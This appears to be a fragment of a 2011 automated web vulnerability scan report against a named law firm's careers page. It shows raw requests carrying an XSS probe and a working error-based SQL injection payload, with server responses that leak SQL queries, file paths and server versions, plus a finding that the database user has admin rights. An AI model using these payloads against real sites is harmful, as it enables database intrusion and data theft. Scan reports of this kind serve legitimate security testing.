src="http://www.nutter.com/media/leftNav/publications_events.gif" name="publications_events" alt="PUBLICATIONS & EVENTS"/></a><a href="http://www.nutter.com/careers.php" title="CAREERS" onmouseover="rollover('careers', 'http://www.nutter.com/media/lef..
Parameters
Parameter
Type
Value
CategoryID
GET
23 '"--></style></script><script>alert(0x00002A)</script>
Request
GET /careers.php?CategoryID=23%00%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker(0x00002A)%3C%2Fscript%3E HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: www.nutter.com Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK Date: Wed, 20 Apr 2011 01:16:42 GMT Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) PHP/4.4.9 with Suhosin-Patch X-Powered-By: PHP/4.4.9 Transfer-Encoding: chunked Content-Type: text/html <!-- careers start -->error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\0\'\"--></style></script><script>netsparker(0x00002A)</script>' at line 1 | 1064<BR>sql: SELECT CategoryName FROM _categories WHERE CategoryID=23\0\'\"--></style></script><script>netsparker(0x00002A)</script><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/2000/REC-xhtml1-20000126/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" ><head><meta name="google-site-verification" content="aSIXeItWGw2SQPO6rIkdjASym5HnHabHM71ZCR6d0oU" />error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\0\'\"--></style></script><script>netsparker(0x00002A)</script> ORDER BY C.Caree' at line 1 | 1064<BR>sql: SELECT DISTINCT(C.CareerID) FROM careers C,_relations R1,_relations R2 WHERE C.IsActive='y' AND C.CareerID=R1.FieldValue AND R1.TableName='careers' AND R1.KeyID=R2.KeyID AND R2.TableName='_categories' AND R2.FieldValue=23\0\'\"--></style></script><script>netsparker(0x00002A)</script> ORDER BY C.CareerTitle LIMIT 1<br /><b>Fatal error</b>: Call to a member function on a non-object in <b>/usr/local/apache/htdocs/_templates/objects/seo.php</b> on line <b>343</b><br />
Database User Has Admin Privileges
Database User Has Admin Privileges
Netsparker identified that the target web site is connecting to the backend database by using a user that has administrative privileges. This issue has been
confirmed by checking the connection privileges via an identified SQL Injection vulnerability in the application.
Impact
This can allow an attacker to gain extra privileges via SQL Injection attacks. Here is the list of attacks that the attacker might carry out:
Gain full access to the database server.
Gain a reverse shell to the database server and execute commands on the underlying operating system.
Access the database with full permissions. Where it may be possible to read, update or delete arbitrary data from the database.
Furthermore, depending on the platform and the database system user an attacker might carry out a privilege escalation attack to gain administrator access to the target system.
Create a database user with the least possible permissions for your application and connect to the database with that user. Always follow the principle of providing the least privileges for all users and applications.
External References
Request
GET /careers.php?CategoryID=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))&CareerID=17&SectionID=380 HTTP/1.1 Referer: http://www.nutter.com/careers.php?CategoryID=23 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: www.nutter.com Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK Date: Wed, 20 Apr 2011 01:12:17 GMT Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) PHP/4.4.9 with Suhosin-Patch X-Powered-By: PHP/4.4.9 Transfer-Encoding: chunked Content-Type: text/html <!-- careers start --><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/2000/REC-xhtml1-20000126/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" ><head><meta name="google-site-verification" content="aSIXeItWGw2SQPO6rIkdjASym5HnHabHM71ZCR6d0oU" /><!--Careers : Nutter McClennen & Fish LLP--> <title>Careers : Nutter McClennen & Fish LLP</title><!-- <meta name="keywords" content="keywords: Nutter McClennen & Fish, Pharmaceutical medical devices, Financial services, Real Estate lawyers, Technology attorneys, Business lawyers, Boston law firm, Louis Brandeis, Patent and trademark, Government enforcement defense, Products liability defense" /> <meta name="description" content="description: Leading Boston business law firm serving life sciences, financial services, real estate, technology and other industrues." />--> <meta name="keywords" content="keywords: Nutter McClennen & Fish, Pharmaceutical medical devices, Financial services, Real Estate lawyers, Technology attorneys, Business lawyers, Boston law firm, Louis Brandeis, Patent and trademark, Government enforcement defense, Products liability defense" /> <meta name="description" content="description: Leading Boston business law firm serving life sciences, financial services, real estate, technology and other industrues." /> <link rel="Stylesheet" rev="Stylesheet" href="/_css/stylesheet.main.css" media="screen" /> <link rel="Stylesheet" rev="Stylesheet" href="/custom.css.php" media="screen" /><!-- <link rel="Stylesheet" rev="Stylesheet" href="/custom.temp.css" media="screen" /> --> <link rel="Stylesheet" rev="Stylesheet" href="/_css/stylesheet.careers.css" media="screen" /> <link rel="Stylesheet" rev="Stylesheet" href="/_css/printstyle.main.css" media="print" /> <link rel="Stylesheet" rev="Stylesheet" href="/_css/printstyle.careers.css" media="print" /> <link rel="icon" type="image/png" href="/media/images/NM-favicon.ico" /><script src="_libs/libs.global.js" type="text/javascript" language="javascript"></script><script src="_libs/libs.flash-fix.js" type="text/javascript" language="javascript"></script><script src="_libs/libs.subCategories.js" type="text/javascript" language="javascript"></script><script type="text/javascript">// topnav_biographies_off= new Image();// topnav_biographies_off.src = "/maintenance/media/topnav_biographies.gif";</script></head><body><!-- header start --> <div id="printHeader"> <img src="http://www.nutter.com/media/images/nutter_logo_print.gif"/> </div> <div id="bodyContainer"> <div id="headerArea"> <ul> <li><a href="http://www.nutter.com/home.php" title="Home" onmouseover="rollover('Home', 'http://www.nutter.com/media/images/home_over.gif')" onmouseout="rollover('Home', 'http://www.nutter.com/media/images/home.gif')"><img src="http://www.nutter.com/media/images/home.gif" alt="Home" name="Home"/></a></li> <li><a href="http://www.nutter.com/contact.php" title="Contact Us" onmouseover="rollover('contact', 'http://www.nutter.com/media/images/contact_us_over.gif')" onmouseout="rollover('contact', 'http://www.nutter.com/media/images/contact_us.gif')"><img src="http://www.nutter.com/media/images/contact_us.gif" alt="Contact Us" name="contact"/></a></li> <li><label for="Search" onmouseover="rollover('search', 'http://www.nutter.com/media/images/search_over.gif')" onmouseout="rollover('search', 'http://www.nutter.com/media/images/search.gif')"><img src="http://www.nutter.com/media/images/search.gif" alt="Search" name="search"/></label></li> </ul> <form method="get" id="searchField" action="http://www.nutter.com/search.php"> <div id="siteSearch"> <input type="text" name="query" id="Search"/><input type="image" src="/media/images/button_arrow_blue.gif" name="Submit" title="Go" id="Submit"/> </div> </form> </div> <!-- header end --> <!-- body start --><!-- 2009.10.5, Ye Wang: Debug db <div style="border:2px solid green; display:block;clear:both;float:none;margin:5em 0;margin-bottom:1em"> <br clear="all" /></div><br clear="all" /> ---> <!-- END OF DEBUGGING --><div id="Container"> <!-- Start Right Ads --><div id="Ads"> <div class="adBlock"> <!--- <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="114" height="83" border="0"> <param name="movie" value="/media/swf/NM-banner.swf" /> <param name="quality" value="high" /> <param name="flashvars" value="&image1=%2Fmedia%2Faboutus%2Fmedia.240.jpg&image2=%2Fmedia%2Faboutus%2Fmedia.241.jpg&goUrl=http%3A%2F%2Fnutter1.securesites.net%2Fkey_industries.php%3FIndustryID%3D19"/> <embed border="0" src="/media/swf/NM-banner.swf" quality="high" pluginspage="http://www.macromedia.com/go/getflashplayer" type="application/x-shockwave-flash" width="114" height="83" flashvars="&image1=%2Fmedia%2Faboutus%2Fmedia.240.jpg&image2=%2Fmedia%2Faboutus%2Fmedia.241.jpg&goUrl=http%3A%2F%2Fnutter1.securesites.net%2Fkey_industries.php%3FIndustryID%3D19"></embed> <noembed><a href="http://www.macromedia.com/go/getflashplayer" title="Download Macromedia Flash">Get Flash</a></noembed> </object> ---> <!--- This is a fix so that users don't have to click on flash image to activate it ---> <div id="adFlashContent1"><a href="http://www.macromedia.com/go/getflashplayer" title="Download Macromedia Flash">Get Flash</a></div> <script type="text/javascript"> var adfo = new FlashObject("/media/swf/NM-banner.swf", "adFlashContent1", "114", "83", "6", "#000000"); adfo.addVariable("flashvars", "&image1=%2Fmedia%2Faboutus%2Fmedia.240.jpg&image2=%2Fmedia%2Faboutus%2Fmedia.241.jpg&goUrl=http%3A%2F%2Fnutter1.securesites.net%2Fkey_industries.php%3FIndustryID%3D19"); adfo.write("adFlashContent1"); </script> </div> <div class="adBlock"> <!--- <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="114" height="83" border="0"> <param name="movie" value="/media/swf/NM-banner.swf" /> <param name="quality" value="high" /> <param name="flashvars" value="&image1=%2Fmedia%2Faboutus%2Fmedia.242.jpg&image2=%2Fmedia%2Faboutus%2Fmedia.243.jpg&goUrl=http%3A%2F%2Fnutter1.securesites.net%2Fabout.php%3FAboutusID%3D3"/> <embed border="0" src="/media/swf/NM-banner.swf" quality="high" pluginspage="http://www.macromedia.com/go/getflashplayer" type="application/x-shockwave-flash" width="114" height="83" flashvars="&image1=%2Fmedia%2Faboutus%2Fmedia.242.jpg&image2=%2Fmedia%2Faboutus%2Fmedia.243.jpg&goUrl=http%3A%2F%2Fnutter1.securesites.net%2Fabout.php%3FAboutusID%3D3"></embed> <noembed><a href="http://www.macromedia.com/go/getflashplayer" title="Download Macromedia Flash">Get Flash</a></noembed> </object> ---> <!--- This is a fix so that users don't have to click on flash image to activate it ---> <div id="adFlashContent2"><a href="http://www.macromedia.com/go/getflashplayer" title="Download Macromedia Flash">Get Flash</a></div> <script type="text/javascript"> var adfo = new FlashObject("/media/swf/NM-banner.swf", "adFlashContent2", "114", "83", "6", "#000000"); adfo.addVariable("flashvars", "&image1=%2Fmedia%2Faboutus%2Fmedia.242.jpg&image2=%2Fmedia%2Faboutus%2Fmedia.243.jpg&goUrl=http%3A%2F%2Fnutter1.securesites.net%2Fabout.php%3FAboutusID%3D3"); adfo.write("adFlashContent2"); </script> </div><!-- dkoleba 2010/11/10 start --><!-- dkoleba 2010/11/10 end --></div><!-- End Right Ads --> <div id="mainContent"> <br /><b>Notice</b>: Undefined offset: 1 in <b>/usr/local/apache/htdocs/_templates/templates.careers.php</b> on line <b>50</b><br />error: Duplicate entry '_!@4dilemma:0' for key 1 | 1062<BR>sql: SELECT CategoryName FROM _categories WHERE IsActive='y' AND CategoryID=(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1)) LIMIT 1<br /><b>Notice</b>: Undefined offset: 1 in <b>/usr/local/apache/htdocs/_templates/templates.careers.php</b> on line <b>75</b><br /><ul id="industryNav"> <li><a href="http://www.nutter.com/key_industries.php?IndustryID=6" title="Life Sciences" id="keyLife"><span>LIFE SCIENCES</span></a></li> <li><a href="http://www.nutter.com/key_industries.php?IndustryID=4" title="Financial Services" id="keyFinance"><span>FINANCIAL SERVICES</span></a></li> <li><a href="http://www.nutter.com/key_industries.php?IndustryID=13" title="Real Estate" id="keyReal"><span>REAL ESTATE</span></a></li> <li><a href="http://www.nutter.com/key_industries.php?IndustryID=10" title="Manufacturing" id="keyManufacture"><span>MANUFACTURING</span></a></li> <li><a href="http://www.nutter.com/key_industries.php?IndustryID=15" title="Technology" id="keyTech"><span>TECHNOLOGY</span></a></li> <li><a href="http://www.nutter.com/client_services.php" title="More" id="keyMore"><span>MORE</span></a></li></ul><img src="/media/aboutus/media.221.jpg" width="450" height="124" id="smallImage"><h2></h2><ul id="categoryNav"><li><a href="javascript:void(0)" title="Law Students">Law Students</a> <ul> <li class="Top"><a href="http://www.nutter.com/careers.php?CategoryID=22&CareerID=3&subID=1" title="Summer Associate Program">Summer Associate Program</a></li> <li><a href="http://www.nutter.com/careers.php?CategoryID=22&CareerID=4&subID=1" title="Fall Recruiting">Fall Recruiting</a></li> </ul> </li><li><a href="http://www.nutter.com/careers.php?CategoryID=23" title="Laterals" class="Left">Laterals</a><li><a href="http://www.nutter.com/careers.php?CategoryID=24" title="Administrative Staff" class="Left">Administrative Staff</a> </ul> <div id="subNav" class="Raised" style="cursor: default;"><!-- dkoleba 2010/11/11 start --> <a href="http://www.nutter.com/media/news/media.669.pdf" target="_blank" style="margin-top: 15px; margin-left: 11px; border: 0;"><img src="../media/images/Midlevel_2010_Nutter2_114v1.jpg" width="114" border="0"></a><!-- <a href="/publications_events.php?NewsID=689" style="border-bottom: 0px;"><img src="../media/images/2008BestPlaces.jpg" alt="Best Places to Work - Boston Business Journal 2008" width="86" height="86" border="0" style="margin-top: 15px; margin-left: 25px;"></a><br/> <a href="../media/images/media.bestplacetowork.pdf" target="_blank" style="border-bottom: 0px;"><img src="../media/images/marketinglogocolorfinal.jpg" alt="The Boston Globe - GLOBE100's - Top Places to Work '08" width="86" height="86" border="0" style="margin-top: 15px; margin-left: 25px;"></a>dkoleba 2010/11/11 end --></div><div id="NarrativeText"><p><a href="/media/news/media.669.pdf" target="_blank"><strong>Nutter Ranks #1 Nationally for Associate Satisfaction for Third Consecutive Year</strong></a></p>If you want a challenging and supportive environment in which to advance your career, then we invite you to explore joining Nutter.<br /><br />For Associate or Technical Specialists opportunities, please contact:<br /><p>Terese Cunningham, Director of Legal Recruitment<br />Nutter McClennen & Fish LLP<br />Seaport West<br />155 Seaport Boulevard<br />Boston, MA 02210<br />Email: <a target="_blank" href="mailto: tcunningham@nutter.com">tcunningham@nutter.com</a><br />Phone: 617-439-2351<br /></p><p>For Partnership opportunities, please contact: <br /></p><p>James E. Dawson, Esq.<br />Nutter McClennen & Fish LLP<br />Seaport West<br />155 Seaport Boulevard<br />Boston, MA 02210<br />E-mail:<a target="_blank" href="mailto: jdawson@nutter.com"> jdawson@nutter.com</a><br />Phone: 617-439-2623 <br /></p></div> </div><h1><a href="http://www.nutter.com/home.php" title="Nutter McClennen & Fish"><span>Careers : Nutter McClennen & Fish LLP</span></a></h1><div id="Navigation"> <a href="http://www.nutter.com/about.php" title="ABOUT US" onmouseover="rollover('about', 'http://www.nutter.com/media/leftNav/about_over.gif')" onmouseout="rollover('about', 'http://www.nutter.com/media/leftNav/about.gif')"><img src="http://www.nutter.com/media/leftNav/about.gif" name="about" alt="ABOUT US"/></a><a href="http://www.nutter.com/client_services.php" title="CLIENT SERVICES" onmouseover="rollover('client_services', 'http://www.nutter.com/media/leftNav/client_services_over.gif')" onmouseout="rollover('client_services', 'http://www.nutter.com/media/leftNav/client_services.gif')"><img src="http://www.nutter.com/media/leftNav/client_services.gif" name="client_services" alt="CLIENT SERVICES"/></a><a href="http://www.nutter.com/attorneys.php" title="ATTORNEYS" onmouseover="rollover('attorneys', 'http://www.nutter.com/media/leftNav/attorneys_over.gif')" onmouseout="rollover('attorneys', 'http://www.nutter.com/media/leftNav/attorneys.gif')"><img src="http://www.nutter.com/media/leftNav/attorneys.gif" name="attorneys" alt="ATTORNEYS"/></a><a href="http://www.nutter.com/publications_events.php" title="PUBLICATIONS & EVENTS" onmouseover="rollover('publications_events', 'http://www.nutter.com/media/leftNav/publications_events_over.gif')" onmouseout="rollover('publications_events', 'http://www.nutter.com/media/leftNav/publications_events.gif')"><img src="http://www.nutter.com/media/leftNav/publications_events.gif" name="publications_events" alt="PUBLICATIONS & EVENTS"/></a><a href="http://www.nutter.com/careers.php" title="CAREERS" onmouseover="rollover('careers', 'http://www.nutter.com/media/leftNav/careers_over.gif')" onmouseout="rollover('careers', 'http://www.nutter.com/media/leftNav/careers_over.gif')"><img src="http://www.nutter.com/media/leftNav/careers_over.gif" name="careers" alt="CAREERS"/></a><a href="http://www.nutter.com/offices.php" title="OFFICES" onmouseover="rollover('offices', 'http://www.nutter.com/media/leftNav/offices_over.gif')" onmouseout="rollover('offices', 'http://www.nutter.com/media/leftNav/offices.gif')"><img src="http://www.nutter.com/media/leftNav/offices.gif" name="offices" alt="OFFICES"/></a><a href="http://www.nutter.com/client_services.php?SectionID=2" title="NUTTER INVESTMENT ADVISORS" onmouseover="rollover('advisors', 'http://www.nutter.com/media/leftNav/advisors_over.gif')" onmouseout="rollover('advisors', 'http://www.nutter.com/media/leftNav/advisors.gif')"><img src="http://www.nutter.com/media/leftNav/advisors.gif" name="advisors" alt="NUTTER INVESTMENT ADVISORS"/></a> </div></div><!-- body end --> <!--- sIFR script ---><script type="text/javascript">//<![CDATA[// Load the sIFR font for the feed's title.if(typeof sIFR == "function"){ sIFR.replaceElement(named({sSelector:"h1", sFlashSrc:"./_sifr/century.swf", sColor:"#244185", sHoverColor:"#666666", sBgColor:"#ffffff", sFlashVars..
Apache Version Disclosure
Apache Version Disclosure
Netsparker identified that the target web server is an Apache server. This was disclosed through the HTTP response. This information can help an attacker to gain a greater understanding of the systems in use and potentially develop further attacks targeted at the specific version of Apache.
Impact
An attacker can search for specific security vulnerabilities for the version of Apache identified within the SERVER header.
Configure your web server to prevent information leakage from the SERVER
header of its HTTP response.
1.3.42
Request
GET /careers.php?CategoryID=23 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: www.nutter.com Accept-Encoding: gzip, deflate Connection: Keep-Alive
Response
HTTP/1.1 200 OK Date: Wed, 20 Apr 2011 01:09:54 GMT Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) PHP/4.4.9 with Suhosin-Patch X-Powered-By: PHP/4.4.9 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html <!-- careers start --><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/2000/REC-xhtml1-20000126/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" ><head><meta name="google-site-verification" content="aSIXeItWGw2SQPO6rIkdjASym5HnHabHM71ZCR6d0oU" /><!--Laterals : Careers : Nutter McClennen & Fish LLP--> <title>Laterals : Careers : Nutter McClennen & Fish LLP</title><!-- <meta name="keywords" content="keywords: Nutter McClennen & Fish, Pharmaceutical medical devices, Financial services, Real Estate lawyers, Technology attorneys, Business lawyers, Boston law firm, Louis Brandeis, Patent and trademark, Government enforcement defense, Products liability defense" /> <meta name="description" content="description: Leading Boston business law firm serving life sciences, financial services, real estate, technology and other industrues." />--> <meta name="keywords" content="keywords: Nutter McClennen & Fish, Pharmaceutical medical devices, Financial services, Real Estate lawyers, Technology attorneys, Business lawyers, Boston law firm, Louis Brandeis, Patent and trademark, Government enforcement defense, Products liability defense" /> <meta name="description" content="description: Leading Boston business law firm serving life sciences, financial services, real estate, technology and other industrues." /> <link rel="Stylesheet" rev="Stylesheet" href="/_css/stylesheet.main.css" media="screen" /> <link rel="Stylesheet" rev="Stylesheet" href="/custom.css.php" media="screen" /><!-- <link rel="Stylesheet" rev="Stylesheet" href="/custom.temp.css" media="screen" /> --> <link rel="Stylesheet" rev="Stylesheet" href="/_css/stylesheet.careers.css" media="screen" /> <link rel="Stylesheet" rev="Stylesheet" href="/_css/printstyle.main.css" media="print" /> <link rel="Stylesheet" rev="Stylesheet" href="/_css/printstyle.careers.css" media="print" /> <link rel="icon" type="image/png" href="/media/images/NM-favicon.ico" /><script src="_libs/libs.global.js" type="text/javascript" language="javascript"></script><script src="_libs/libs.flash-fix.js" type="text/javascript" language="javascript"></script><script src="_libs/libs.subCategories.js" type="text/javascript" language="javascript"></script><script type="text/javascript">// topnav_biographies_off= new Image();// topnav_biographies_off.src = "/maintenance/media/topnav_biographies.gif";</script></head><body><!-- header start --> <div id="printHeader"> <img src="http://www.nutter.com/media/images/nutter_logo_print.gif"/> </div> <div id="bodyContainer"> <div id="headerArea"> <ul> <li><a href="http://www.nutter.com/home.php" title="Home" onmouseover="rollover('Home', 'http://www.nutter.com/media/images/home_over.gif')" onmouseout="rollover('Home', 'http://www.nutter.com/media/images/home.gif')"><img src="http://www.nutter.com/media/images/home.gif" alt="Home" name="Home"/></a></li> <li><a href="http://www.nutter.com/contact.php" title="Contact Us" onmouseover="rollover('contact', 'http://www.nutter.com/media/images/contact_us_over.gif')" onmouseout="rollover('contact', 'http://www.nutter.com/media/images/contact_us.gif')"><img src="http://www.nutter.com/media/images/contact_us.gif" alt="Contact Us" name="contact"/></a></li> <li><label for="Search" onmouseover="rollover('search', 'http://www.nutter.com/media/images/search_over.gif')" onmouseout="rollover('search', 'http://www.nutter.com/media/images/search.gif')"><img src="http://www.nutter.com/media/images/search.gif" alt="Search" name="search"/></label></li> </ul> <form method="get" id="searchField" action="http://www.nutter.com/search.php"> <div id="siteSearch"> <input type="text" name="query" id="Search"/><input type="image" src="/media/images/button_arrow_blue.gif" name="Submit" title="Go" id="Submit"/> </div> </form> </div> <!-- header end --> <!-- body start --><!-- 2009.10.5, Ye Wang: Debug db <div style="border:2px solid green; display:block;clear:both;float:none;margin:5em 0;margin-bottom:1em"> <br clear="all" /></div><br clear="all" /> ---> <!-- END OF DEBUGGING --><div id="Container"> <!-- Start Right Ads --><div id="Ads"> <div class="adBlock"> <!--- <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="114" height="83" border="0"> <param name="movie" value="/media/swf/NM-banner.swf" /> <param name="quality" value="high" /> <param name="flashvars" value="&image1=%2Fmedia%2Faboutus%2Fmedia.240.jpg&image2=%2Fmedia%2Faboutus%2Fmedia.241.jpg&goUrl=http%3A%2F%2Fnutter1.securesites.net%2Fkey_industries.php%3FIndustryID%3D19"/> <embed border="0" src="/media/swf/NM-banner.swf" quality="high" pluginspage="http://www.macromedia.com/go/getflashplayer" type="application/x-shockwave-flash" width="114" height="83" flashvars="&image1=%2Fmedia%2Faboutus%2Fmedia.240.jpg&image2=%2Fmedia%2Faboutus%2Fmedia.241.jpg&goUrl=http%3A%2F%2Fnutter1.securesites.net%2Fkey_industries.php%3FIndustryID%3D19"></embed> <noembed><a href="http://www.macromedia.com/go/getflashplayer" title="Download Macromedia Flash">Get Flash</a></noembed> </object> ---> <!--- This is a fix so that users don't have to click on flash image to activate it ---> <div id="adFlashContent1"><a href="http://www.macromedia.com/go/getflashplayer" title="Download Macromedia Flash">Get Flash</a></div> <script type="text/javascript"> var adfo = new FlashObject("/media/swf/NM-banner.swf", "adFlashContent1", "114", "83", "6", "#000000"); adfo.addVariable("flashvars", "&image1=%2Fmedia%2Faboutus%2Fmedia.240.jpg&image2=%2Fmedia%2Faboutus%2Fmedia.241.jpg&goUrl=http%3A%2F%2Fnutter1.securesites.net%2Fkey_industries.php%3FIndustryID%3D19"); adfo.write("adFlashContent1"); </script> </div> <div class="adBlock"> <!--- <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="114" height="83" border="0"> <param name="movie" value="/media/swf/NM-banner.swf" /> <param name="quality" value="high" /> <param name="flashvars" value="&image1=%2Fmedia%2Faboutus%2Fmedia.242.jpg&image2=%2Fmedia%2Faboutus%2Fmedia.243.jpg&goUrl=http%3A%2F%2Fnutter1.securesites.net%2Fabout.php%3FAboutusID%3D3"/> <embed border="0" src="/media/swf/NM-banner.swf" quality="high" pluginspage="http://www.macromedia.com/go/getflashplayer" type="application/x-shockwave-flash" width="114" height="83" flashvars="&image1=%2Fmedia%2Faboutus%2Fmedia.242.jpg&image2=%2Fmedia%2Faboutus%2Fmedia.243.jpg&goUrl=http%3A%2F%2Fnutter1.securesites.net%2Fabout.php%3FAboutusID%3D3"></embed> <noembed><a href="http://www.macromedia.com/go/getflashplayer" title="Download Macromedia Flash">Get Flash</a></noembed> </object> ---> <!--- This is a fix so that users don't have to click on flash image to activate it ---> <div id="adFlashContent2"><a href="http://www.macromedia.com/go/getflashplayer" title="Download Macromedia Flash">Get Flash</a></div> <script type="text/javascript"> var adfo = new FlashObject("/media/swf/NM-banner.swf", "adFlashContent2", "114", "83", "6", "#000000"); adfo.addVariable("flashvars", "&image1=%2Fmedia%2Faboutus%2Fmedia.242.jpg&image2=%2Fmedia%2Faboutus%2Fmedia.243.jpg&goUrl=http%3A%2F%2Fnutter1.securesites.net%2Fabout.php%3FAboutusID%3D3"); adfo.write("adFlashContent2"); </script> </div><!-- dkoleba 2010/11/10 start --><!-- dkoleba 2010/11/10 end --></div><!-- End Right Ads --> <div id="mainContent"> <ul id="industryNav"> <li><a href="http://www.nutter.com/key_industries.php?IndustryID=6" title="Life Sciences" id="keyLife"><span>LIFE SCIENCES</span></a></li> <li><a href="http://www.nutter.com/key_industries.php?IndustryID=4" title="Financial Services" id="keyFinance"><span>FINANCIAL SERVICES</span></a></li> <li><a href="http://www.nutter.com/key_industries.php?IndustryID=13" title="Real Estate" id="keyReal"><span>REAL ESTATE</span></a></li> <li><a href="http://www.nutter.com/key_industries.php?IndustryID=10" title="Manufacturing" id="keyManufacture"><span>MANUFACTURING</span></a></li> <li><a href="http://www.nutter.com/key_industries.php?IndustryID=15" title="Technology" id="keyTech"><span>TECHNOLOGY</span></a></li> <li><a href="http://www.nutter.com/client_services.php" title="More" id="keyMore"><span>MORE</span></a></li></ul><img src="/media/aboutus/media.221.jpg" width="450" height="124" id="smallImage"><h2><img src="/media/aboutus/media.362.gif" border="0" title="" alt=""></h2><ul id="categoryNav"><li><a href="javascript:void(0)" title="Law Students">Law Students</a> <ul> <li class="Top"><a href="http://www.nutter.com/careers.php?CategoryID=22&CareerID=3&subID=1" title="Summer Associate Program">Summer Associate Program</a></li> <li><a href="http://www.nutter.com/careers.php?CategoryID=22&CareerID=4&subID=1" title="Fall Recruiting">Fall Recruiting</a></li> </ul> </li><li><a href="http://www.nutter.com/careers.php?CategoryID=23" title="Laterals" class="Left" id="hilited">Laterals</a><li><a href="http://www.nutter.com/careers.php?CategoryID=24" title="Administrative Staff" class="Left">Administrative Staff</a> </ul> <div id="subNav" class="Raised"> <h3><img src="/media/aboutus/media.343.gif" border="0" title="" alt=""></h3> <ul> <li><a href="http://www.nutter.com/careers.php?CategoryID=23&CareerID=17&SectionID=380" title="Overview">Overview</a></li><li><a href="http://www.nutter.com/careers.php?CategoryID=23&CareerID=5&SectionID=378" title="Open Positions">Open Positions</a></li><li><a href="http://www.nutter.com/careers.php?CategoryID=23&CareerID=7&SectionID=367" title="Diversity">Diversity</a></li><li><a href="http://www.nutter.com/careers.php?CategoryID=23&CareerID=8&SectionID=384" title="Nutter's Clients">Nutter's Clients</a></li><li><a href="http://www.nutter.com/careers.php?CategoryID=23&CareerID=9&SectionID=382" title="Pro Bono & Community Service">Pro Bono & Community Service</a></li><li><a href="http://www.nutter.com/careers.php?CategoryID=23&CareerID=10&SectionID=361" title="Training & Mentoring">Training & Mentoring</a></li><li><a href="http://www.nutter.com/careers.php?CategoryID=23&CareerID=11&SectionID=374" title="Benefits">Benefits</a></li><li><a href="http://www.nutter.com/careers.php?CategoryID=23&CareerID=19&SectionID=1041" title="AmLaw Mid-Level Associates Survey">AmLaw Mid-Level Associates Survey</a></li> </ul><!-- dkoleba 2010/11/11 start --> <a href="http://www.nutter.com/media/news/media.669.pdf" target="_blank" style="border: 0;"><img src="../media/images/Midlevel_2010_Nutter2_114v1.jpg" width="114" border="0" style="margin-top: 15px; margin-left: 8px;"></a><!-- <a href="/publications_events.php?NewsID=689" style="border-bottom: 0px;"><img src="../media/images/2008BestPlaces.jpg" alt="Best Places to Work - Boston Business Journal 2008" width="86" height="86" border="0" style="margin-top: 15px; margin-left: 25px;"></a> <br/> <a href="../media/images/media.bestplacetowork.pdf" target="_blank" style="border-bottom: 0px;"><img src="../media/images/marketinglogocolorfinal.jpg" alt="The Boston Globe - GLOBE100's - Top Places to Work '08" width="86" height="86" border="0" style="margin-top: 15px; margin-left: 25px;"></a>dkoleba 2010/11/11 end --></div><div id="NarrativeText"><p><a href="/media/news/media.669.pdf" target="_blank"><strong>Nutter Ranks #1 Nationally for Associate Satisfaction for Third Consecutive Year</strong></a></p>If you want a challenging and supportive environment in which to advance your career, then we invite you to explore joining Nutter.<br /><br />For Associate or Technical Specialists opportunities, please contact:<br /><p>Terese Cunningham, Director of Legal Recruitment<br />Nutter McClennen & Fish LLP<br />Seaport West<br />155 Seaport Boulevard<br />Boston, MA 02210<br />Email: <a target="_blank" href="mailto: tcunningham@nutter.com">tcunningham@nutter.com</a><br />Phone: 617-439-2351<br /></p><p>For Partnership opportunities, please contact: <br /></p><p>James E. Dawson, Esq.<br />Nutter McClennen & Fish LLP<br />Seaport West<br />155 Seaport Boulevard<br />Boston, MA 02210<br />E-mail:<a target="_blank" href="mailto: jdawson@nutter.com"> jdawson@nutter.com</a><br />Phone: 617-439-2623 <br /></p></div> </div><h1><a href="http://www.nutter.com/home.php" title="Nutter McClennen & Fish"><span>Laterals : Careers : Nutter McClennen & Fish LLP</span></a></h1><div id="Navigation"> <a 